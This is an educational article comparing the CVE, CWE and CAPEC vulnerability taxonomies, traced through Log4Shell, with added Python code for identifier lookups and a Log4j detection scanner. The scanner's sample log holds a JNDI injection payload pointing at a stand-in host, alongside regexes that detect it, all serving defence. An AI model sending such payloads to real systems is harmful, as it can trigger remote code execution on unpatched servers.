CVE Chapter

CVE vs CWE vs CAPEC: What's the Difference?

Jul 3, 2026 · 9 min read · Beginner

The Big Picture

If you have spent any time in cybersecurity, you have almost certainly seen the acronyms CVE, CWE, and CAPEC, sometimes used interchangeably even though they describe very different things. Understanding each one and how they relate helps you reason about vulnerabilities, fix root causes, and work with security tools and compliance frameworks.

Here is the simplest possible summary:

All three are maintained by MITRE Corporation under US government contracts. They form a layered security vocabulary used by government agencies, security tools, compliance frameworks, and vulnerability researchers worldwide.

CVE — Common Vulnerabilities and Exposures

A CVE is a unique, public identifier for a specific security vulnerability in a specific product or version. The format is CVE-YEAR-NUMBER, for example CVE-2021-44228 for Log4Shell.

CVE entries contain:

CVEs answer the question: "Is my software vulnerable to this specific known bug?"

Who assigns CVEs? MITRE and a network of over 400 organisations called CVE Numbering Authorities (CNAs). Vendors like Microsoft, Google, and Cisco are CNAs and assign their own CVEs directly.

CWE — Common Weakness Enumeration

A CWE describes a category of software or hardware weakness — the type of mistake in code or design that leads to vulnerabilities. CWEs are not tied to a specific product; they describe patterns that appear across thousands of CVEs.

Examples of widely referenced CWEs:

CWE ID   | Name                               | Description
---------|------------------------------------|----------------------------------------------------------------------------
CWE-79   | Cross-site Scripting (XSS)         | Improper neutralisation of input in web pages
CWE-89   | SQL Injection                      | User input inserted into SQL queries without sanitisation
CWE-787  | Out-of-bounds Write                | Writing data past the end of a buffer (buffer overflow)
CWE-22   | Path Traversal                     | Allowing user input to navigate outside intended directories
CWE-917  | Expression Language Injection      | User-controlled input evaluated in an expression language (Log4Shell's CWE)
CWE-502  | Deserialization of Untrusted Data  | Deserialising data from untrusted sources without validation
CWE-200  | Exposure of Sensitive Information  | Software exposes data to unauthorised actors

CWEs answer the question: "What class of coding mistake caused this vulnerability, and how do we prevent it in future code?"

MITRE organises CWEs in a hierarchy. At the top are abstract Pillars (like "Improper Input Validation"), then Classes, then Base weaknesses (specific enough to map to specific CVEs), then Variants (very specific conditions). The NVD typically maps CVEs to Base-level CWEs.

OWASP Top 10 and CWE

The OWASP Top 10 — the most-referenced web security risk list — maps directly to CWEs. For example, "A03: Injection" covers CWE-89 (SQL), CWE-77 (Command), and CWE-79 (XSS). This is why understanding CWEs makes OWASP compliance much easier to reason about.

CAPEC — Common Attack Pattern Enumeration and Classification

CAPEC (pronounced "cape-eck") describes how attackers exploit weaknesses. While CWE describes the flaw in the code, CAPEC describes the attacker's methodology and technique used to abuse it.

CAPEC entries include:

Some examples of CAPEC entries:

CAPEC ID   | Name                               | Related CWE
-----------|------------------------------------|------------------
CAPEC-66   | SQL Injection                      | CWE-89
CAPEC-86   | XSS via HTTP Request Headers       | CWE-79
CAPEC-62   | Cross Site Request Forgery (CSRF)  | CWE-352
CAPEC-100  | Overflow Buffers                   | CWE-119, CWE-787
CAPEC-560  | Use of Known Domain Credentials    | CWE-522
CAPEC-17   | Using Malicious Files              | CWE-434

CAPEC answers the question: "How would an attacker actually exploit this type of weakness, step by step?"

CAPEC is heavily used in threat modelling exercises, red team planning, and in frameworks like MITRE ATT&CK (which describes adversary tactics and techniques at an even higher level).

How CVE, CWE, and CAPEC Connect

The three systems form a chain from abstract attack technique down to a specific exploitable instance in production software.

CAPEC              →   CWE              →   CVE
(attack technique)     (code weakness)      (specific vulnerability instance)

Attacker uses a technique → exploits a weakness class → targets a specific vulnerable product

For example:

Security tools use these links in both directions. A SAST (static analysis) tool might flag CWE-79 in code — before any CVE exists. A vulnerability scanner might find CVE-2023-XXXXX — and then surface the CWE to help the developer understand the root cause. A threat modelling tool might start from CAPEC-86 and ask "which CWEs could enable this attack, and do we have any CVEs for those in our stack?"
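The two-directional lookups described above, as an added example that is not part of the original article: the CAPEC-to-CWE links come from this article's tables, while the software inventory (CVE-to-CWE) is a constructed placeholder, with only the Log4Shell mapping taken from the text.

```python
import re

# Identifier formats as the article states them: CVE-YEAR-NUMBER, CWE-NUMBER, CAPEC-NUMBER.
ID_PATTERNS = {
    "CVE": re.compile(r"^CVE-\d{4}-\d{4,}$"),
    "CWE": re.compile(r"^CWE-\d+$"),
    "CAPEC": re.compile(r"^CAPEC-\d+$"),
}

def id_kind(identifier: str) -> str:
    """Return 'CVE', 'CWE' or 'CAPEC' for a well-formed id; raise ValueError otherwise."""
    for kind, pattern in ID_PATTERNS.items():
        if pattern.match(identifier.strip().upper()):
            return kind
    raise ValueError(f"not a CVE/CWE/CAPEC identifier: {identifier!r}")

# CAPEC -> CWE links, taken from the two tables in this article.
CAPEC_TO_CWE = {
    "CAPEC-66": {"CWE-89"},
    "CAPEC-86": {"CWE-79"},
    "CAPEC-62": {"CWE-352"},
    "CAPEC-100": {"CWE-119", "CWE-787"},
    "CAPEC-560": {"CWE-522"},
    "CAPEC-17": {"CWE-434"},
    "CAPEC-35": {"CWE-917"},
}
# A hypothetical inventory as a scanner would report it (CVE -> root-cause CWE).
# CVE-2021-44228 -> CWE-917 is from the article; CVE-2099-* are constructed placeholders.
INVENTORY_CVE_TO_CWE = {
    "CVE-2021-44228": "CWE-917",
    "CVE-2099-00001": "CWE-79",
    "CVE-2099-00002": "CWE-787",
}

def cwes_for_capec(capec: str) -> set:
    """Threat-modelling direction: which weakness classes enable this attack pattern?"""
    return set(CAPEC_TO_CWE.get(capec, set()))

def cves_for_capec(capec: str, inventory=INVENTORY_CVE_TO_CWE) -> list:
    """...and do we have any CVEs for those weaknesses in our stack?"""
    cwes = cwes_for_capec(capec)
    return sorted(cve for cve, cwe in inventory.items() if cwe in cwes)

def capecs_for_cve(cve: str, inventory=INVENTORY_CVE_TO_CWE) -> tuple:
    """Scanner direction: CVE -> root-cause CWE -> attack patterns that exploit that CWE."""
    cwe = inventory.get(cve)
    if cwe is None:
        return None, []
    return cwe, sorted(c for c, cwes in CAPEC_TO_CWE.items() if cwe in cwes)
```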

Real-World Example: Log4Shell

Let's trace Log4Shell through all three frameworks to make this concrete.

Framework | Entry                                                      | What it tells you
----------|------------------------------------------------------------|-------------------
CVE       | CVE-2021-44228                                             | Apache Log4j 2.x before 2.15.0 allows remote code execution via JNDI lookup in log messages. CVSS 10.0 Critical.
CWE       | CWE-917: Expression Language Injection                     | The root cause is that Log4j evaluates user-supplied strings as expression language. The fix is to not evaluate untrusted input as code, a general principle applicable to all software.
CAPEC     | CAPEC-35: Leverage Executable Code in Non-Executable Files | The attack technique is embedding executable payloads (JNDI strings) into data that the target will process. Defenders should monitor for JNDI:// strings in log inputs.

A developer who understands only the CVE knows to patch Log4j. A developer who understands the CWE knows to never evaluate untrusted strings as expressions in any language or framework. A security architect who understands the CAPEC knows to look for similar injection points across all logging and input-processing code — not just Log4j.
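A minimal version of the monitoring the CAPEC row recommends, added here as an example rather than code from the original article. It assumes the Log4j lookup syntax `${...}`, with a JNDI lookup written as `${jndi:...}` (the article abbreviates this as "JNDI://"), and runs over constructed log lines.

```python
import re
from typing import List, Tuple

# Log4j lookups are written as ${...}; the Log4Shell vector is a ${jndi:...} lookup.
# Both forms are assumed here as documented Log4j syntax (the article writes "JNDI://").
LOOKUP_RE = re.compile(r"\$\{[^}]{1,256}\}")
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def classify_log_line(line: str) -> Tuple[str, List[str]]:
    """Grade one line of untrusted log input.
    'high'   : a JNDI lookup is present (the CVE-2021-44228 pattern)
    'medium' : some other ${...} expression reached the logger (the CWE-917 class)
    'none'   : no lookup syntax at all"""
    lookups = LOOKUP_RE.findall(line)
    if JNDI_RE.search(line):
        return "high", lookups
    if lookups:
        return "medium", lookups
    return "none", []

def scan(lines: List[str]) -> List[dict]:
    """Return only the flagged lines, tagged with the article's CWE and CAPEC ids so a
    triage ticket carries the root cause and attack pattern, not just the string match."""
    findings = []
    for number, line in enumerate(lines, start=1):
        severity, lookups = classify_log_line(line)
        if severity != "none":
            findings.append({"line": number, "severity": severity, "lookups": lookups,
                             "cwe": "CWE-917", "capec": "CAPEC-35"})
    return findings

# Constructed sample input (not real traffic); the User-Agent field is untrusted input.
SAMPLE_LOG = [
    'GET /index.html 200 ua="Mozilla/5.0"',
    'GET /login 401 ua="${jndi:ldap://example.invalid/a}"',
    'GET /search?q=${lookup:value} 200',
    'GET /health 200 ua="curl/8.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```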

Side-by-Side Comparison

Dimension             | CVE                                            | CWE                                         | CAPEC
----------------------|------------------------------------------------|---------------------------------------------|------------------------------------------------------
Full name             | Common Vulnerabilities and Exposures           | Common Weakness Enumeration                 | Common Attack Pattern Enumeration and Classification
What it describes     | A specific vulnerability in a specific product | A class of coding or design weakness        | An attack technique or methodology
Maintained by         | MITRE + CNAs                                   | MITRE                                       | MITRE
ID format             | CVE-YEAR-NUMBER                                | CWE-NUMBER                                  | CAPEC-NUMBER
Example               | CVE-2021-44228 (Log4Shell)                     | CWE-917 (EL Injection)                      | CAPEC-35 (Code in Non-Executable Files)
Total entries (2026)  | 250,000+                                       | 900+                                        | 500+
Used by               | Patch management, vulnerability scanners       | SAST tools, OWASP, secure coding standards  | Threat modelling, red teams, ATT&CK
Answers               | Is this software vulnerable?                   | Why is this type of code unsafe?            | How do attackers exploit this?

Frequently Asked Questions

What is the difference between CVE and CWE?
A CVE is a specific vulnerability instance in a specific product (e.g., a buffer overflow in Apache 2.4.51). A CWE is the class of weakness that caused it (e.g., CWE-787 Out-of-bounds Write). One CWE can explain thousands of different CVEs.
What is CAPEC?
CAPEC (Common Attack Pattern Enumeration and Classification) describes how attackers exploit weaknesses. Where CWE describes the flaw in code, CAPEC describes the technique used to attack it. CAPEC-66, for example, describes SQL injection attacks.
Who maintains CVE, CWE, and CAPEC?
All three are maintained by MITRE Corporation under a US government contract. CVE is at cve.mitre.org, CWE at cwe.mitre.org, and CAPEC at capec.mitre.org.
How do CVE, CWE, and CAPEC work together?
They form a layered model: CAPEC describes attack techniques, CWE describes the code-level weaknesses attackers exploit, and CVE records specific vulnerable software instances. Together they link attack methods to root causes to real-world vulnerabilities.
Do I need to know all three for a security certification?
For CompTIA Security+, CEH, and CISSP you need to understand CVE and CWE. CAPEC is referenced in advanced threat modelling certifications and the MITRE ATT&CK framework. For most practitioners, CVE and CWE are the daily essentials.